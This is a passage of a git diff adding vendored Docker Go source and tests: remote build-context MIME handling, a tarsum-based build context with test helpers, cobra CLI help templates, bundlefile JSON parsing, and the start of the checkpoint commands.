+	if len(ct) == 0 || ct == httputils.MimeTypes.OctetStream {
+		contentType, _, err = httputils.DetectContentType(preamble)
+		if err != nil {
+			return contentType, bodyReader, err
+		}
+	}
+
+	contentType = selectAcceptableMIME(contentType)
+	var cterr error
+	if len(contentType) == 0 {
+		cterr = fmt.Errorf("unsupported Content-Type %q", ct)
+		contentType = ct
+	}
+
+	return contentType, bodyReader, cterr
+}
+
+func selectAcceptableMIME(ct string) string {
+	return mimeRe.FindString(ct)
+}
diff --git a/vendor/github.com/docker/docker/builder/remote_test.go b/vendor/github.com/docker/docker/builder/remote_test.go
new file mode 100644
index 0000000000..691a084761
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remote_test.go
@@ -0,0 +1,213 @@
+package builder
+
+import (
+	"bytes"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"testing"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/httputils"
+)
+
+var binaryContext = []byte{0xFD, 0x37, 0x7A, 0x58, 0x5A, 0x00} //xz magic
+
+func TestSelectAcceptableMIME(t *testing.T) {
+	validMimeStrings := []string{
+		"application/x-bzip2",
+		"application/bzip2",
+		"application/gzip",
+		"application/x-gzip",
+		"application/x-xz",
+		"application/xz",
+		"application/tar",
+		"application/x-tar",
+		"application/octet-stream",
+		"text/plain",
+	}
+
+	invalidMimeStrings := []string{
+		"",
+		"application/octet",
+		"application/json",
+	}
+
+	for _, m := range invalidMimeStrings {
+		if len(selectAcceptableMIME(m)) > 0 {
+			t.Fatalf("Should not have accepted %q", m)
+		}
+	}
+
+	for _, m := range validMimeStrings {
+		if str := selectAcceptableMIME(m); str == "" {
+			t.Fatalf("Should have accepted %q", m)
+		}
+	}
+}
+
+func TestInspectEmptyResponse(t *testing.T) {
+	ct := "application/octet-stream"
+	br := ioutil.NopCloser(bytes.NewReader([]byte("")))
+	contentType, bReader, err := inspectResponse(ct, br, 0)
+	if err == nil {
+		t.Fatalf("Should have generated an error for an empty response")
+	}
+	if contentType != "application/octet-stream" {
+		t.Fatalf("Content type should be 'application/octet-stream' but is %q", contentType)
+	}
+	body, err := ioutil.ReadAll(bReader)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(body) != 0 {
+		t.Fatal("response body should remain empty")
+	}
+}
+
+func TestInspectResponseBinary(t *testing.T) {
+	ct := "application/octet-stream"
+	br := ioutil.NopCloser(bytes.NewReader(binaryContext))
+	contentType, bReader, err := inspectResponse(ct, br, int64(len(binaryContext)))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if contentType != "application/octet-stream" {
+		t.Fatalf("Content type should be 'application/octet-stream' but is %q", contentType)
+	}
+	body, err := ioutil.ReadAll(bReader)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(body) != len(binaryContext) {
+		t.Fatalf("Wrong response size %d, should be == len(binaryContext)", len(body))
+	}
+	for i := range body {
+		if body[i] != binaryContext[i] {
+			t.Fatalf("Corrupted response body at byte index %d", i)
+		}
+	}
+}
+
+func TestResponseUnsupportedContentType(t *testing.T) {
+	content := []byte(dockerfileContents)
+	ct := "application/json"
+	br := ioutil.NopCloser(bytes.NewReader(content))
+	contentType, bReader, err := inspectResponse(ct, br, int64(len(dockerfileContents)))
+
+	if err == nil {
+		t.Fatal("Should have returned an error on content-type 'application/json'")
+	}
+	if contentType != ct {
+		t.Fatalf("Should not have altered content-type: orig: %s, altered: %s", ct, contentType)
+	}
+	body, err := ioutil.ReadAll(bReader)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(body) != dockerfileContents {
+		t.Fatalf("Corrupted response body %s", body)
+	}
+}
+
+func TestInspectResponseTextSimple(t *testing.T) {
+	content := []byte(dockerfileContents)
+	ct := "text/plain"
+	br := ioutil.NopCloser(bytes.NewReader(content))
+	contentType, bReader, err := inspectResponse(ct, br, int64(len(content)))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if contentType != "text/plain" {
+		t.Fatalf("Content type should be 'text/plain' but is %q", contentType)
+	}
+	body, err := ioutil.ReadAll(bReader)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(body) != dockerfileContents {
+		t.Fatalf("Corrupted response body %s", body)
+	}
+}
+
+func TestInspectResponseEmptyContentType(t *testing.T) {
+	content := []byte(dockerfileContents)
+	br := ioutil.NopCloser(bytes.NewReader(content))
+	contentType, bodyReader, err := inspectResponse("", br, int64(len(content)))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if contentType != "text/plain" {
+		t.Fatalf("Content type should be 'text/plain' but is %q", contentType)
+	}
+	body, err := ioutil.ReadAll(bodyReader)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(body) != dockerfileContents {
+		t.Fatalf("Corrupted response body %s", body)
+	}
+}
+
+func TestMakeRemoteContext(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+
+	mux := http.NewServeMux()
+	server := httptest.NewServer(mux)
+	serverURL, _ := url.Parse(server.URL)
+
+	serverURL.Path = "/" + DefaultDockerfileName
+	remoteURL := serverURL.String()
+
+	mux.Handle("/", http.FileServer(http.Dir(contextDir)))
+
+	remoteContext, err := MakeRemoteContext(remoteURL, map[string]func(io.ReadCloser) (io.ReadCloser, error){
+		httputils.MimeTypes.TextPlain: func(rc io.ReadCloser) (io.ReadCloser, error) {
+			dockerfile, err := ioutil.ReadAll(rc)
+			if err != nil {
+				return nil, err
+			}
+
+			r, err := archive.Generate(DefaultDockerfileName, string(dockerfile))
+			if err != nil {
+				return nil, err
+			}
+			return ioutil.NopCloser(r), nil
+		},
+	})
+
+	if err != nil {
+		t.Fatalf("Error when executing DetectContextFromRemoteURL: %s", err)
+	}
+
+	if remoteContext == nil {
+		t.Fatalf("Remote context should not be nil")
+	}
+
+	tarSumCtx, ok := remoteContext.(*tarSumContext)
+
+	if !ok {
+		t.Fatalf("Cast error, remote context should be casted to tarSumContext")
+	}
+
+	fileInfoSums := tarSumCtx.sums
+
+	if fileInfoSums.Len() != 1 {
+		t.Fatalf("Size of file info sums should be 1, got: %d", fileInfoSums.Len())
+	}
+
+	fileInfo := fileInfoSums.GetFile(DefaultDockerfileName)
+
+	if fileInfo == nil {
+		t.Fatalf("There should be file named %s in fileInfoSums", DefaultDockerfileName)
+	}
+
+	if fileInfo.Pos() != 0 {
+		t.Fatalf("File %s should have position 0, got %d", DefaultDockerfileName, fileInfo.Pos())
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/tarsum.go b/vendor/github.com/docker/docker/builder/tarsum.go
new file mode 100644
index 0000000000..35054dcba1
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/tarsum.go
@@ -0,0 +1,158 @@
+package builder
+
+import (
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/symlink"
+	"github.com/docker/docker/pkg/tarsum"
+)
+
+type tarSumContext struct {
+	root string
+	sums tarsum.FileInfoSums
+}
+
+func (c *tarSumContext) Close() error {
+	return os.RemoveAll(c.root)
+}
+
+func convertPathError(err error, cleanpath string) error {
+	if err, ok := err.(*os.PathError); ok {
+		err.Path = cleanpath
+		return err
+	}
+	return err
+}
+
+func (c *tarSumContext) Open(path string) (io.ReadCloser, error) {
+	cleanpath, fullpath, err := c.normalize(path)
+	if err != nil {
+		return nil, err
+	}
+	r, err := os.Open(fullpath)
+	if err != nil {
+		return nil, convertPathError(err, cleanpath)
+	}
+	return r, nil
+}
+
+func (c *tarSumContext) Stat(path string) (string, FileInfo, error) {
+	cleanpath, fullpath, err := c.normalize(path)
+	if err != nil {
+		return "", nil, err
+	}
+
+	st, err := os.Lstat(fullpath)
+	if err != nil {
+		return "", nil, convertPathError(err, cleanpath)
+	}
+
+	rel, err := filepath.Rel(c.root, fullpath)
+	if err != nil {
+		return "", nil, convertPathError(err, cleanpath)
+	}
+
+	// We set sum to path by default for the case where GetFile returns nil.
+	// The usual case is if relative path is empty.
+	sum := path
+	// Use the checksum of the followed path(not the possible symlink) because
+	// this is the file that is actually copied.
+	if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil {
+		sum = tsInfo.Sum()
+	}
+	fi := &HashedFileInfo{PathFileInfo{st, fullpath, filepath.Base(cleanpath)}, sum}
+	return rel, fi, nil
+}
+
+// MakeTarSumContext returns a build Context from a tar stream.
+//
+// It extracts the tar stream to a temporary folder that is deleted as soon as
+// the Context is closed.
+// As the extraction happens, a tarsum is calculated for every file, and the set of
+// all those sums then becomes the source of truth for all operations on this Context.
+//
+// Closing tarStream has to be done by the caller.
+func MakeTarSumContext(tarStream io.Reader) (ModifiableContext, error) {
+	root, err := ioutils.TempDir("", "docker-builder")
+	if err != nil {
+		return nil, err
+	}
+
+	tsc := &tarSumContext{root: root}
+
+	// Make sure we clean-up upon error.  In the happy case the caller
+	// is expected to manage the clean-up
+	defer func() {
+		if err != nil {
+			tsc.Close()
+		}
+	}()
+
+	decompressedStream, err := archive.DecompressStream(tarStream)
+	if err != nil {
+		return nil, err
+	}
+
+	sum, err := tarsum.NewTarSum(decompressedStream, true, tarsum.Version1)
+	if err != nil {
+		return nil, err
+	}
+
+	if err := chrootarchive.Untar(sum, root, nil); err != nil {
+		return nil, err
+	}
+
+	tsc.sums = sum.GetSums()
+
+	return tsc, nil
+}
+
+func (c *tarSumContext) normalize(path string) (cleanpath, fullpath string, err error) {
+	cleanpath = filepath.Clean(string(os.PathSeparator) + path)[1:]
+	fullpath, err = symlink.FollowSymlinkInScope(filepath.Join(c.root, path), c.root)
+	if err != nil {
+		return "", "", fmt.Errorf("Forbidden path outside the build context: %s (%s)", path, fullpath)
+	}
+	_, err = os.Lstat(fullpath)
+	if err != nil {
+		return "", "", convertPathError(err, path)
+	}
+	return
+}
+
+func (c *tarSumContext) Walk(root string, walkFn WalkFunc) error {
+	root = filepath.Join(c.root, filepath.Join(string(filepath.Separator), root))
+	return filepath.Walk(root, func(fullpath string, info os.FileInfo, err error) error {
+		rel, err := filepath.Rel(c.root, fullpath)
+		if err != nil {
+			return err
+		}
+		if rel == "." {
+			return nil
+		}
+
+		sum := rel
+		if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil {
+			sum = tsInfo.Sum()
+		}
+		fi := &HashedFileInfo{PathFileInfo{FileInfo: info, FilePath: fullpath}, sum}
+		if err := walkFn(rel, fi, nil); err != nil {
+			return err
+		}
+		return nil
+	})
+}
+
+func (c *tarSumContext) Remove(path string) error {
+	_, fullpath, err := c.normalize(path)
+	if err != nil {
+		return err
+	}
+	return os.RemoveAll(fullpath)
+}
diff --git a/vendor/github.com/docker/docker/builder/tarsum_test.go b/vendor/github.com/docker/docker/builder/tarsum_test.go
new file mode 100644
index 0000000000..278e5830de
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/tarsum_test.go
@@ -0,0 +1,265 @@
+package builder
+
+import (
+	"bufio"
+	"bytes"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/reexec"
+)
+
+const (
+	filename = "test"
+	contents = "contents test"
+)
+
+func init() {
+	reexec.Init()
+}
+
+func TestCloseRootDirectory(t *testing.T) {
+	contextDir, err := ioutil.TempDir("", "builder-tarsum-test")
+
+	if err != nil {
+		t.Fatalf("Error with creating temporary directory: %s", err)
+	}
+
+	tarsum := &tarSumContext{root: contextDir}
+
+	err = tarsum.Close()
+
+	if err != nil {
+		t.Fatalf("Error while executing Close: %s", err)
+	}
+
+	_, err = os.Stat(contextDir)
+
+	if !os.IsNotExist(err) {
+		t.Fatalf("Directory should not exist at this point")
+		defer os.RemoveAll(contextDir)
+	}
+}
+
+func TestOpenFile(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	createTestTempFile(t, contextDir, filename, contents, 0777)
+
+	tarSum := &tarSumContext{root: contextDir}
+
+	file, err := tarSum.Open(filename)
+
+	if err != nil {
+		t.Fatalf("Error when executing Open: %s", err)
+	}
+
+	defer file.Close()
+
+	scanner := bufio.NewScanner(file)
+	buff := bytes.NewBufferString("")
+
+	for scanner.Scan() {
+		buff.WriteString(scanner.Text())
+	}
+
+	if contents != buff.String() {
+		t.Fatalf("Contents are not equal. Expected: %s, got: %s", contents, buff.String())
+	}
+
+}
+
+func TestOpenNotExisting(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	tarSum := &tarSumContext{root: contextDir}
+
+	file, err := tarSum.Open("not-existing")
+
+	if file != nil {
+		t.Fatal("Opened file should be nil")
+	}
+
+	if !os.IsNotExist(err) {
+		t.Fatalf("Error when executing Open: %s", err)
+	}
+}
+
+func TestStatFile(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	testFilename := createTestTempFile(t, contextDir, filename, contents, 0777)
+
+	tarSum := &tarSumContext{root: contextDir}
+
+	relPath, fileInfo, err := tarSum.Stat(filename)
+
+	if err != nil {
+		t.Fatalf("Error when executing Stat: %s", err)
+	}
+
+	if relPath != filename {
+		t.Fatalf("Relative path should be equal to %s, got %s", filename, relPath)
+	}
+
+	if fileInfo.Path() != testFilename {
+		t.Fatalf("Full path should be equal to %s, got %s", testFilename, fileInfo.Path())
+	}
+}
+
+func TestStatSubdir(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir")
+
+	testFilename := createTestTempFile(t, contextSubdir, filename, contents, 0777)
+
+	tarSum := &tarSumContext{root: contextDir}
+
+	relativePath, err := filepath.Rel(contextDir, testFilename)
+
+	if err != nil {
+		t.Fatalf("Error when getting relative path: %s", err)
+	}
+
+	relPath, fileInfo, err := tarSum.Stat(relativePath)
+
+	if err != nil {
+		t.Fatalf("Error when executing Stat: %s", err)
+	}
+
+	if relPath != relativePath {
+		t.Fatalf("Relative path should be equal to %s, got %s", relativePath, relPath)
+	}
+
+	if fileInfo.Path() != testFilename {
+		t.Fatalf("Full path should be equal to %s, got %s", testFilename, fileInfo.Path())
+	}
+}
+
+func TestStatNotExisting(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	tarSum := &tarSumContext{root: contextDir}
+
+	relPath, fileInfo, err := tarSum.Stat("not-existing")
+
+	if relPath != "" {
+		t.Fatal("Relative path should be nil")
+	}
+
+	if fileInfo != nil {
+		t.Fatalf("File info should be nil")
+	}
+
+	if !os.IsNotExist(err) {
+		t.Fatalf("This file should not exist: %s", err)
+	}
+}
+
+func TestRemoveDirectory(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir")
+
+	relativePath, err := filepath.Rel(contextDir, contextSubdir)
+
+	if err != nil {
+		t.Fatalf("Error when getting relative path: %s", err)
+	}
+
+	tarSum := &tarSumContext{root: contextDir}
+
+	err = tarSum.Remove(relativePath)
+
+	if err != nil {
+		t.Fatalf("Error when executing Remove: %s", err)
+	}
+
+	_, err = os.Stat(contextSubdir)
+
+	if !os.IsNotExist(err) {
+		t.Fatalf("Directory should not exist at this point")
+	}
+}
+
+func TestMakeTarSumContext(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	createTestTempFile(t, contextDir, filename, contents, 0777)
+
+	tarStream, err := archive.Tar(contextDir, archive.Uncompressed)
+
+	if err != nil {
+		t.Fatalf("error: %s", err)
+	}
+
+	defer tarStream.Close()
+
+	tarSum, err := MakeTarSumContext(tarStream)
+
+	if err != nil {
+		t.Fatalf("Error when executing MakeTarSumContext: %s", err)
+	}
+
+	if tarSum == nil {
+		t.Fatalf("Tar sum context should not be nil")
+	}
+}
+
+func TestWalkWithoutError(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir")
+
+	createTestTempFile(t, contextSubdir, filename, contents, 0777)
+
+	tarSum := &tarSumContext{root: contextDir}
+
+	walkFun := func(path string, fi FileInfo, err error) error {
+		return nil
+	}
+
+	err := tarSum.Walk(contextSubdir, walkFun)
+
+	if err != nil {
+		t.Fatalf("Error when executing Walk: %s", err)
+	}
+}
+
+type WalkError struct {
+}
+
+func (we WalkError) Error() string {
+	return "Error when executing Walk"
+}
+
+func TestWalkWithError(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir")
+
+	tarSum := &tarSumContext{root: contextDir}
+
+	walkFun := func(path string, fi FileInfo, err error) error {
+		return WalkError{}
+	}
+
+	err := tarSum.Walk(contextSubdir, walkFun)
+
+	if err == nil {
+		t.Fatalf("Error should not be nil")
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/utils_test.go b/vendor/github.com/docker/docker/builder/utils_test.go
new file mode 100644
index 0000000000..1101ff1d1d
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/utils_test.go
@@ -0,0 +1,87 @@
+package builder
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+const (
+	dockerfileContents   = "FROM busybox"
+	dockerignoreFilename = ".dockerignore"
+	testfileContents     = "test"
+)
+
+// createTestTempDir creates a temporary directory for testing.
+// It returns the created path and a cleanup function which is meant to be used as deferred call.
+// When an error occurs, it terminates the test.
+func createTestTempDir(t *testing.T, dir, prefix string) (string, func()) {
+	path, err := ioutil.TempDir(dir, prefix)
+
+	if err != nil {
+		t.Fatalf("Error when creating directory %s with prefix %s: %s", dir, prefix, err)
+	}
+
+	return path, func() {
+		err = os.RemoveAll(path)
+
+		if err != nil {
+			t.Fatalf("Error when removing directory %s: %s", path, err)
+		}
+	}
+}
+
+// createTestTempSubdir creates a temporary directory for testing.
+// It returns the created path but doesn't provide a cleanup function,
+// so createTestTempSubdir should be used only for creating temporary subdirectories
+// whose parent directories are properly cleaned up.
+// When an error occurs, it terminates the test.
+func createTestTempSubdir(t *testing.T, dir, prefix string) string {
+	path, err := ioutil.TempDir(dir, prefix)
+
+	if err != nil {
+		t.Fatalf("Error when creating directory %s with prefix %s: %s", dir, prefix, err)
+	}
+
+	return path
+}
+
+// createTestTempFile creates a temporary file within dir with specific contents and permissions.
+// When an error occurs, it terminates the test
+func createTestTempFile(t *testing.T, dir, filename, contents string, perm os.FileMode) string {
+	filePath := filepath.Join(dir, filename)
+	err := ioutil.WriteFile(filePath, []byte(contents), perm)
+
+	if err != nil {
+		t.Fatalf("Error when creating %s file: %s", filename, err)
+	}
+
+	return filePath
+}
+
+// chdir changes current working directory to dir.
+// It returns a function which changes working directory back to the previous one.
+// This function is meant to be executed as a deferred call.
+// When an error occurs, it terminates the test.
+func chdir(t *testing.T, dir string) func() {
+	workingDirectory, err := os.Getwd()
+
+	if err != nil {
+		t.Fatalf("Error when retrieving working directory: %s", err)
+	}
+
+	err = os.Chdir(dir)
+
+	if err != nil {
+		t.Fatalf("Error when changing directory to %s: %s", dir, err)
+	}
+
+	return func() {
+		err = os.Chdir(workingDirectory)
+
+		if err != nil {
+			t.Fatalf("Error when changing back to working directory (%s): %s", workingDirectory, err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/cobra.go b/vendor/github.com/docker/docker/cli/cobra.go
new file mode 100644
index 0000000000..139845cb1b
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/cobra.go
@@ -0,0 +1,139 @@
+package cli
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/spf13/cobra"
+)
+
+// SetupRootCommand sets default usage, help, and error handling for the
+// root command.
+func SetupRootCommand(rootCmd *cobra.Command) {
+	cobra.AddTemplateFunc("hasSubCommands", hasSubCommands)
+	cobra.AddTemplateFunc("hasManagementSubCommands", hasManagementSubCommands)
+	cobra.AddTemplateFunc("operationSubCommands", operationSubCommands)
+	cobra.AddTemplateFunc("managementSubCommands", managementSubCommands)
+
+	rootCmd.SetUsageTemplate(usageTemplate)
+	rootCmd.SetHelpTemplate(helpTemplate)
+	rootCmd.SetFlagErrorFunc(FlagErrorFunc)
+	rootCmd.SetHelpCommand(helpCommand)
+
+	rootCmd.PersistentFlags().BoolP("help", "h", false, "Print usage")
+	rootCmd.PersistentFlags().MarkShorthandDeprecated("help", "please use --help")
+}
+
+// FlagErrorFunc prints an error message which matches the format of the
+// docker/docker/cli error messages
+func FlagErrorFunc(cmd *cobra.Command, err error) error {
+	if err == nil {
+		return err
+	}
+
+	usage := ""
+	if cmd.HasSubCommands() {
+		usage = "\n\n" + cmd.UsageString()
+	}
+	return StatusError{
+		Status:     fmt.Sprintf("%s\nSee '%s --help'.%s", err, cmd.CommandPath(), usage),
+		StatusCode: 125,
+	}
+}
+
+var helpCommand = &cobra.Command{
+	Use:               "help [command]",
+	Short:             "Help about the command",
+	PersistentPreRun:  func(cmd *cobra.Command, args []string) {},
+	PersistentPostRun: func(cmd *cobra.Command, args []string) {},
+	RunE: func(c *cobra.Command, args []string) error {
+		cmd, args, e := c.Root().Find(args)
+		if cmd == nil || e != nil || len(args) > 0 {
+			return fmt.Errorf("unknown help topic: %v", strings.Join(args, " "))
+		}
+
+		helpFunc := cmd.HelpFunc()
+		helpFunc(cmd, args)
+		return nil
+	},
+}
+
+func hasSubCommands(cmd *cobra.Command) bool {
+	return len(operationSubCommands(cmd)) > 0
+}
+
+func hasManagementSubCommands(cmd *cobra.Command) bool {
+	return len(managementSubCommands(cmd)) > 0
+}
+
+func operationSubCommands(cmd *cobra.Command) []*cobra.Command {
+	cmds := []*cobra.Command{}
+	for _, sub := range cmd.Commands() {
+		if sub.IsAvailableCommand() && !sub.HasSubCommands() {
+			cmds = append(cmds, sub)
+		}
+	}
+	return cmds
+}
+
+func managementSubCommands(cmd *cobra.Command) []*cobra.Command {
+	cmds := []*cobra.Command{}
+	for _, sub := range cmd.Commands() {
+		if sub.IsAvailableCommand() && sub.HasSubCommands() {
+			cmds = append(cmds, sub)
+		}
+	}
+	return cmds
+}
+
+var usageTemplate = `Usage:
+
+{{- if not .HasSubCommands}}	{{.UseLine}}{{end}}
+{{- if .HasSubCommands}}	{{ .CommandPath}} COMMAND{{end}}
+
+{{ .Short | trim }}
+
+{{- if gt .Aliases 0}}
+
+Aliases:
+  {{.NameAndAliases}}
+
+{{- end}}
+{{- if .HasExample}}
+
+Examples:
+{{ .Example }}
+
+{{- end}}
+{{- if .HasFlags}}
+
+Options:
+{{.Flags.FlagUsages | trimRightSpace}}
+
+{{- end}}
+{{- if hasManagementSubCommands . }}
+
+Management Commands:
+
+{{- range managementSubCommands . }}
+  {{rpad .Name .NamePadding }} {{.Short}}
+{{- end}}
+
+{{- end}}
+{{- if hasSubCommands .}}
+
+Commands:
+
+{{- range operationSubCommands . }}
+  {{rpad .Name .NamePadding }} {{.Short}}
+{{- end}}
+{{- end}}
+
+{{- if .HasSubCommands }}
+
+Run '{{.CommandPath}} COMMAND --help' for more information on a command.
+{{- end}}
+`
+
+var helpTemplate = `
+{{if or .Runnable .HasSubCommands}}{{.UsageString}}{{end}}`
diff --git a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go
new file mode 100644
index 0000000000..7fd1e4f6c4
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go
@@ -0,0 +1,69 @@
+package bundlefile
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+)
+
+// Bundlefile stores the contents of a bundlefile
+type Bundlefile struct {
+	Version  string
+	Services map[string]Service
+}
+
+// Service is a service from a bundlefile
+type Service struct {
+	Image      string
+	Command    []string          `json:",omitempty"`
+	Args       []string          `json:",omitempty"`
+	Env        []string          `json:",omitempty"`
+	Labels     map[string]string `json:",omitempty"`
+	Ports      []Port            `json:",omitempty"`
+	WorkingDir *string           `json:",omitempty"`
+	User       *string           `json:",omitempty"`
+	Networks   []string          `json:",omitempty"`
+}
+
+// Port is a port as defined in a bundlefile
+type Port struct {
+	Protocol string
+	Port     uint32
+}
+
+// LoadFile loads a bundlefile from a path to the file
+func LoadFile(reader io.Reader) (*Bundlefile, error) {
+	bundlefile := &Bundlefile{}
+
+	decoder := json.NewDecoder(reader)
+	if err := decoder.Decode(bundlefile); err != nil {
+		switch jsonErr := err.(type) {
+		case *json.SyntaxError:
+			return nil, fmt.Errorf(
+				"JSON syntax error at byte %v: %s",
+				jsonErr.Offset,
+				jsonErr.Error())
+		case *json.UnmarshalTypeError:
+			return nil, fmt.Errorf(
+				"Unexpected type at byte %v. Expected %s but received %s.",
+				jsonErr.Offset,
+				jsonErr.Type,
+				jsonErr.Value)
+		}
+		return nil, err
+	}
+
+	return bundlefile, nil
+}
+
+// Print writes the contents of the bundlefile to the output writer
+// as human readable json
+func Print(out io.Writer, bundle *Bundlefile) error {
+	bytes, err := json.MarshalIndent(*bundle, "", "    ")
+	if err != nil {
+		return err
+	}
+
+	_, err = out.Write(bytes)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go
new file mode 100644
index 0000000000..c343410df3
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go
@@ -0,0 +1,77 @@
+package bundlefile
+
+import (
+	"bytes"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestLoadFileV01Success(t *testing.T) {
+	reader := strings.NewReader(`{
+		"Version": "0.1",
+		"Services": {
+			"redis": {
+				"Image": "redis@sha256:4b24131101fa0117bcaa18ac37055fffd9176aa1a240392bb8ea85e0be50f2ce",
+				"Networks": ["default"]
+			},
+			"web": {
+				"Image": "dockercloud/hello-world@sha256:fe79a2cfbd17eefc344fb8419420808df95a1e22d93b7f621a7399fd1e9dca1d",
+				"Networks": ["default"],
+				"User": "web"
+			}
+		}
+	}`)
+
+	bundle, err := LoadFile(reader)
+	assert.NilError(t, err)
+	assert.Equal(t, bundle.Version, "0.1")
+	assert.Equal(t, len(bundle.Services), 2)
+}
+
+func TestLoadFileSyntaxError(t *testing.T) {
+	reader := strings.NewReader(`{
+		"Version": "0.1",
+		"Services": unquoted string
+	}`)
+
+	_, err := LoadFile(reader)
+	assert.Error(t, err, "syntax error at byte 37: invalid character 'u'")
+}
+
+func TestLoadFileTypeError(t *testing.T) {
+	reader := strings.NewReader(`{
+		"Version": "0.1",
+		"Services": {
+			"web": {
+				"Image": "redis",
+				"Networks": "none"
+			}
+		}
+	}`)
+
+	_, err := LoadFile(reader)
+	assert.Error(t, err, "Unexpected type at byte 94. Expected []string but received string")
+}
+
+func TestPrint(t *testing.T) {
+	var buffer bytes.Buffer
+	bundle := &Bundlefile{
+		Version: "0.1",
+		Services: map[string]Service{
+			"web": {
+				Image:   "image",
+				Command: []string{"echo", "something"},
+			},
+		},
+	}
+	assert.NilError(t, Print(&buffer, bundle))
+	output := buffer.String()
+	assert.Contains(t, output, "\"Image\": \"image\"")
+	assert.Contains(t, output,
+		`"Command": [
+                "echo",
+                "something"
+            ]`)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go b/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go
new file mode 100644
index 0000000000..d5705a4dad
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go
@@ -0,0 +1,24 @@
+package checkpoint
+
+import (
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+// NewCheckpointCommand returns the `checkpoint` subcommand (only in experimental)
+func NewCheckpointCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "checkpoint",
+		Short: "Manage checkpoints",
+		Args:  cli.NoArgs,
+		RunE:  dockerCli.ShowHelp,
+		Tags:  map[string]string{"experimental": "", "version": "1.25"},
+	}
+	cmd.AddCommand(
+		newCreateCommand(dockerCli),
+		newListCommand(dockerCli),
+		newRemoveCommand(dockerCli),
+	)
+	return cmd
+}
diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/create.go b/vendor/github.com/docker/docker/cli/command/checkpoint/create.go
new file mode 100644
index 0000000000..473a941733
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/checkpoint/create.go
@@ -0,0 +1,58 @@
+package checkpoint
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type createOptions struct {
+	container     string
+	checkpoint    string
+	checkpointDir string
+	leaveRunning  bool
+}
+
+func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts createOptions
+
+	cmd := &cobra.Command{
+		Use:   "create [OPTIONS] CONTAINER CHECKPOINT",
+		Short: "Create a checkpoint from a running container",
+		Args:  cli.ExactArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.container = args[0]
